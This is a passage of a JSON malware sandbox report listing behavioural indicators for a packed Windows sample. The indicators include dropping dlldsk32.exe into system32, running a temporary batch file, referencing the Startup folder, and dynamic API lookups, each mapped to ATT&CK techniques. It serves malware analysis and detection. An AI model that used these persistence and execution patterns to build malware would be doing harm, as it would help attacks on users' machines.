\"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005084)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005084)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0f00100000fce775@ADVAPI32.dll\"\n \"07000800725b8a77@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"15001600c03e1c6c@ADVAPI32.dll\"\n \"0e000f00703f1c6c@ADVAPI32.dll\"\n \"0e000f00cc3f1c6c@ADVAPI32.dll\"\n \"11001200b4471c6c@ADVAPI32.dll\"\n \"1100120048481c6c@ADVAPI32.dll\"\n \"120013008c481c6c@ADVAPI32.dll\"\n \"12001300e4481c6c@ADVAPI32.dll\"\n \"14001500386e1c6c@ADVAPI32.dll\"\n \"14001500506e1c6c@ADVAPI32.dll\"\n \"14001500686e1c6c@ADVAPI32.dll\"\n \"17001800806e1c6c@ADVAPI32.dll\"\n \"0d000e00986e1c6c@ADVAPI32.dll\"\n \"11001200a86e1c6c@ADVAPI32.dll\"\n \"11001200bc6e1c6c@ADVAPI32.dll\"\n \"0d000e0044661c6c@WININET.dll\"\n \"0d000e00b4661c6c@WININET.dll\"\n \"10001100ec661c6c@WININET.dll\"\n \"1000110090671c6c@WININET.dll\"\n \"10001100006f1c6c@WININET.dll\"\n \"10001100146f1c6c@WININET.dll\"\n \"14001500286f1c6c@WININET.dll\"\n \"14001500406f1c6c@WININET.dll\"\n \"12001300586f1c6c@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"dlldsk32.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x41a3e8,push\t0x411908,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x58,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,call\tdword ptr [0x41a190],xor\tedx, edx,mov\tdl, ah,mov\tdword ptr [0x42f11c], edx,mov\tecx, eax,and\tecx, 0xff,mov\tdword ptr [0x42f118], ecx,shl\tecx, 8,add\tecx, edx,mov\tdword ptr [0x42f114], ecx,shr\teax, 0x10,mov\tdword ptr [0x42f110], eax,xor\tesi, esi,push\tesi,call\t0x4142fa,pop\tecx,test\teax, eax,jne\t0x412013,\"\n \"dlldsk32.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x41a3e8,push\t0x411908,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x58,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,call\tdword ptr [0x41a190],xor\tedx, edx,mov\tdl, ah,mov\tdword ptr [0x42f11c], edx,mov\tecx, eax,and\tecx, 0xff,mov\tdword ptr [0x42f118], ecx,shl\tecx, 8,add\tecx, edx,mov\tdword ptr [0x42f114], ecx,shr\teax, 0x10,mov\tdword ptr [0x42f110], eax,xor\tesi, esi,push\tesi,call\t0x4142fa,pop\tecx,test\teax, eax,jne\t0x412013,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\system32\\uxtheme.dll\" [Source: 00000000-00004816-00000C28-1189530000]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\system32\\dlldsk32.exe\" - (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\r2767.bat\"\" - (UID: 00000000-00004816)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004816)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-265", "type": 2, "relevance": 1, "name": "Contains reference to Windows Startup folder", "description": "\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00004816.00000001.139308.001D0000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"KERNEL32.DLL\" at base 76ee0000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"PROFAPI.DLL\" at base 75b10000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70780000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75b40000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"WS2_32.DLL\" at base 77d60000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"WINHTTP.DLL\" at base 71fd0000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"WININET.DLL\" at base 77650000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 754c0000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 754b0000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"IPHLPAPI.DLL\" at base 73e40000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 759a0000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"CRYPTBASE.DLL\" at base 759f0000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74970000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"ADVAPI32.DLL\" at base 77470000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"PROPSYS.DLL\" at base 74640000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"OLE32.DLL\" at base 77240000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"COMCTL32.DLL\" at base 749f0000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"OLEAUT32.DLL\" at base 779b0000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"SHELL32.DLL\" at base 76150000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"CLBCATQ.DLL\" at base 775c0000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74640000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"NTMARTA.DLL\" at base 74f60000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75eb0000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"APPHELP.DLL\" at base 759a0000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6ea70000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 76150000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76ee0000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"SETUPAPI.DLL\" at base 77a50000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 770f0000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"SECUR32.DLL\" at base 75830000\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75d00000\n \"dlldsk32.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71200000\n \"dlldsk32.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dlldsk32.exe\" loaded module \"KERNEL32\" at base 76ee0000\n \"dlldsk32.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dlldsk32.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbc0000\n \"dlldsk32.exe\" loaded module \"KERNEL32.DLL\" at base 76ee0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter WININET.DLL (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"LoadLibrary\" with a parameter %TEMP%\\r2767.bat (UID: 00000000-00004816)\n \"dlldsk32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005072)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\" has an writable section named \"UPX0\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\" has an writable section named \"UPX1\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\" has an writable section named \"UPX2\"\n \"dlldsk32.exe\" has an writable section named \"UPX0\"\n \"dlldsk32.exe\" has an writable section named \"UPX1\"\n \"dlldsk32.exe\" has an writable section named \"UPX2\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\" has an executable section named \"UPX0\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\" has an executable section named \"UPX1\"\n \"dlldsk32.exe\" has an executable section named \"UPX0\"\n \"dlldsk32.exe\" has an executable section named \"UPX1\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DB0000\n \"dlldsk32.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DB0000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DB0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "binary-30", "type": 8, "relevance": 3, "name": "Contains ability to read the PEB (Process Environment Block) structure", "description": "\"sample.bin\" can read PEB structure (dword ptr fs:[00000030h]) (Offset: 51403)", "origin": "Binary File", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"dlldsk32.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dlldsk32.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"dlldsk32.exe\" (UID: 00000000-00005072)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2767.bat\" \"\" (UID: 00000000-00005084)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"dlldsk32.exe\" (UID: 00000000-00005072)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2767.bat\" \"\" (UID: 00000000-00005084)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-220", "type": 9, "relevance": 3, "name": "Executes batch file", "description": "Process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2767.bat\" \"\" (UID: 00000000-00005084)", "origin": "Monitored Target", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"dlldsk32.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"dlldsk32.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-79", "relevance": 1, "name": "Contains ability to dynamically determine API calls", "description": "Found GetProcAddress() and LoadLibraryA() in an import section (Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: dlldsk32.exe)", "origin": "Static Parser", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-354", "type": 2, "relevance": 1, "name": "Contains reference to mutex-related activity (API string)", "description": "Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"OpenMutexA\" (Indicator: \"OpenMutex\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"OpenMutexA\" (Indicator: \"OpenMutex\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-189", "type": 2, "relevance": 3, "name": "Contains ability to reboot/shutdown the operating system (API string)", "description": "Found reference to API \"ExitWindowsEx\" (Indicator: \"ExitWindows\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"ExitWindowsEx\" (Indicator: \"ExitWindows\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-455", "type": 2, "relevance": 3, "name": "Contains reference to multiple windows system processes", "description": "Found strings \"update.exe,svchost.exe,services.exe,csrss.exe,winlogon.exe\" (File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")", "origin": "File/Memory", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\" was detected as \"Microsoft visual C++ 5.0\"\n \"dlldsk32.exe\" was detected as \"Microsoft visual C++ 5.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-481", "type": 2, "relevance": 1, "name": "Reference explorer.exe process", "description": "Found string \"fonts\\explorer.exe\" (Indicator: \"explorer.exe\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"\\explorer.exe\" (Indicator: \"explorer.exe\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"Explorer.exe,%s -shell\" (Indicator: \"explorer.exe\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\Windows\\system32\\dlldsk32.exe\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file 